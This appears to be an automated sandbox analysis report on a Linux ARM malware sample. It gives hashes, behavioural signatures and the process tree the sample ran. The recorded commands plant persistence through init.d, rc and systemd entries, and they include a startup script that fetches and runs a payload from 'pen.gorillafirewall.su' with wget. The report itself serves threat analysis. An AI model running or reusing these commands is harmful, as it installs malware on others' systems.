Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240611-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    19-09-2024 06:59

General

  • Target

    d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf

  • Size

    648KB

  • MD5

    343770e1d6d9a1f782823d8305405da0

  • SHA1

    f07f9fcad82694f36dac9e51e86b1331b69a5d19

  • SHA256

    d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70

  • SHA512

    1fc4e698c3beba8fd9345f1e6e3830824e5cb5a2fa352a9253eb017de546d01398e32b8e4cb10df13b9f7fc2cab9cde418c4233e5cbb4ca99f90dff6e03ec147

  • SSDEEP

    12288:UB9mQoSyE0zYggEKavjwmitmCd89KiCMSggplw7wW0dFEGvW1VPH1h:UboB1zYggEKaLF28QdMx90dFEGvWTPH1

Malware Config

Signatures

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Modifies init.d 2 TTPs 2 IoCs

    Adds/modifies system service, likely for persistence.

  • Modifies rc script 2 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Modifies systemd 2 TTPs 1 IoCs

    Adds/modifies systemd service files, likely to achieve persistence.

  • Modifies Bash startup script 2 TTPs 1 IoCs
  • Changes its process name 1 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 5 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf
    /tmp/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf
    1⤵
    • Modifies Watchdog functionality
    • Creates/modifies environment variables
    • Modifies init.d
    • Modifies rc script
    • Modifies systemd
    • Modifies Bash startup script
    • Changes its process name
    PID:657
    • /bin/sh
      sh -c -- "systemctl enable custom.service >/dev/null 2>&1"
      2⤵
        PID:659
        • /bin/systemctl
          systemctl enable custom.service
          3⤵
          • Enumerates kernel/hardware configuration
          • Reads runtime system information
          PID:661
      • /bin/sh
        sh -c -- "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
        2⤵
        • File and Directory Permissions Modification
        PID:670
        • /bin/chmod
          chmod +x /etc/init.d/mybinary
          3⤵
          • File and Directory Permissions Modification
          PID:672
      • /bin/sh
        sh -c -- "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
        2⤵
          PID:674
          • /bin/ln
            ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
            3⤵
              PID:677
          • /bin/sh
            sh -c -- "echo \"#!/bin/sh # /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf case \\\"\$1\\\" in start) echo 'Starting d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf' /tmp/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf & wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf' killall d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf"
            2⤵
            • File and Directory Permissions Modification
            • Modifies init.d
            PID:680
          • /bin/sh
            sh -c -- "chmod +x /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf >/dev/null 2>&1"
            2⤵
            • File and Directory Permissions Modification
            PID:683
            • /bin/chmod
              chmod +x /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf
              3⤵
              • File and Directory Permissions Modification
              PID:685
          • /bin/sh
            sh -c -- "mkdir -p /etc/rc.d >/dev/null 2>&1"
            2⤵
              PID:687
              • /bin/mkdir
                mkdir -p /etc/rc.d
                3⤵
                • Reads runtime system information
                PID:688
            • /bin/sh
              sh -c -- "ln -s /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf /etc/rc.d/S99d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf >/dev/null 2>&1"
              2⤵
                PID:691
                • /bin/ln
                  ln -s /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf /etc/rc.d/S99d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf
                  3⤵
                    PID:692

              Network

              MITRE ATT&CK Enterprise v15

              Downloads

              • /boot/bootcmd

                Filesize

                185B

                MD5

                6d8ec3d8286c9e54cda61859e7b0fb05

                SHA1

                020b4d6ab5a158cc2904bdd1815725a0f4901af7

                SHA256

                18d6efcb9a5f5f296f6302ce3d4067fd3e8904b16f46759728444eb329bdfd27

                SHA512

                9f9b61068a4d03315f0a14f1f03c97ec20b695cacd63c309211ced4b524f4631c7a680381decf6ca8f2a8779ba470bc1b1d131d48cdb105fac57451963dfef09

              • /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf

                Filesize

                693B

                MD5

                481e0ab2347bdbe19afdac7bc9e30c24

                SHA1

                fdc6b3f56318d4df063d522aea1aec6b1de39018

                SHA256

                a8637084d9994e7fad8d5e9c626b3354f3231d4248aff66896c401f18073c056

                SHA512

                c152ebef13025bf1273269d4c01589e399e121f8e783c2a040639759d90ad4134935b221ba376d56fd1684b207cd2d4cf10b0aafd5aacb6ae2831e16182e341b

              • /etc/init.d/mybinary

                Filesize

                172B

                MD5

                4799ba3a615a9c7430e240895b4b3b03

                SHA1

                af9b5d78f0e4080c0012ed0649f4cc7b407f30d2

                SHA256

                91abe00464fc1b81daefa8c6517e51cc6edd1879c6d76363611144ad25cf7957

                SHA512

                c6221bff5ba670eeec03f8ad19b17ad8ad2396fe10bebcbed8e016a26dc25f64d2393af2e0c1ae681a70ff2af9c35b8157f2ee2d000effbd4b9f92b2c75a8c22

              • /etc/inittab

                Filesize

                177B

                MD5

                fe82379e0454f7aa7a203a0081600ace

                SHA1

                ddbffcfff848b40e546edce6adc925821011f667

                SHA256

                04c89719cc36fbad2d9650abbfc14e271a39bb0fa53d01f38ead377f6b72746d

                SHA512

                20a50140a6bc4f737958193e7d7a45da1502c7c22de4660923a6f02832369f3aa0a6d09ff8687f111adae9021a5335f7694a2a4e5c29ef88e4fb5796f31f0701

              • /etc/systemd/system/custom.service

                Filesize

                366B

                MD5

                045e090de33705e58c29b6bf94e928d4

                SHA1

                3518ffd7c3b1a062a3798507e7a2f2172e34776d

                SHA256

                97fc3a66d57fa4c249dd0a3108932711024cf5b4af48c0ec41994c25955f33b5

                SHA512

                a2255a55ed69ad4e327fa117c79470ee96a1c55f08eca6fb3ded4552ea4cf57264e56c386c76fa41e72fec787f7be3d9b0edd8a07ff2cb69042d604b94fb4aba